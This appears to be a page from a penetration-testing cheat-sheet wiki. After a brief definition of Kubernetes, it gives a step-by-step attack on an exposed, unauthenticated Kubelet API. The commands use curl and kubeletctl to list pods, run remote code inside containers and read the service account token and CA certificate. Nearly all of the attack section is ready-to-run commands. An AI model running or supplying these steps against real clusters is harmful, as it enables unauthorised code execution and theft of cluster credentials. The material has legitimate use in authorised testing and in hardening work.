Kubernetes (K8s)

Definition: Open-source container orchestration platform.
Purpose: Deploy, scale, and manage containerized applications.
Components:
- Control Plane: API server, Scheduler, Controller Manager, etcd
- Worker Nodes (Minions): Run actual containers

Escalate privileges in a Kubernetes cluster by abusing the Kubelet API on port 10250 if it's exposed and unauthenticated

Step 1: Check if the Kubelet API is Exposed

curl -k https://<NODE_IP>:10250/pods

# If you get a JSON response → Kubelet is exposed.
# If you get “unauthorized” or a cert error → may need a token or client cert.

Step 2: Install kubeletctl (if not already installed)

go install github.com/cyberark/kubeletctl@latest

Step 3: List Running Pods

kubeletctl --server <NODE_IP>:10250 pods

Step 4: Try Remote Code Execution (RCE)

kubeletctl --server <NODE_IP>:10250 exec -p <POD_NAME> -c <CONTAINER_NAME> "id"

Step 5: Extract Service Account Token and CA Cert

kubeletctl --server <NODE_IP>:10250 exec -p <POD_NAME> -c <CONTAINER_NAME> "cat /var/run/secrets/kubernetes.io/serviceaccount/token"

kubeletctl --server <NODE_IP>:10250 exec -p <POD_NAME> -c <CONTAINER_NAME> "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt"

PreviousDocker NextShared Object Hijacking

Last updated 8 months ago

hashtagStep 1: Check if the Kubelet API is Exposed

hashtagStep 2: Install kubeletctl (if not already installed)

hashtagStep 3: List Running Pods

hashtagStep 4: Try Remote Code Execution (RCE)

hashtagStep 5: Extract Service Account Token and CA Cert

Step 1: Check if the Kubelet API is Exposed

Step 2: Install kubeletctl (if not already installed)

Step 3: List Running Pods

Step 4: Try Remote Code Execution (RCE)

Step 5: Extract Service Account Token and CA Cert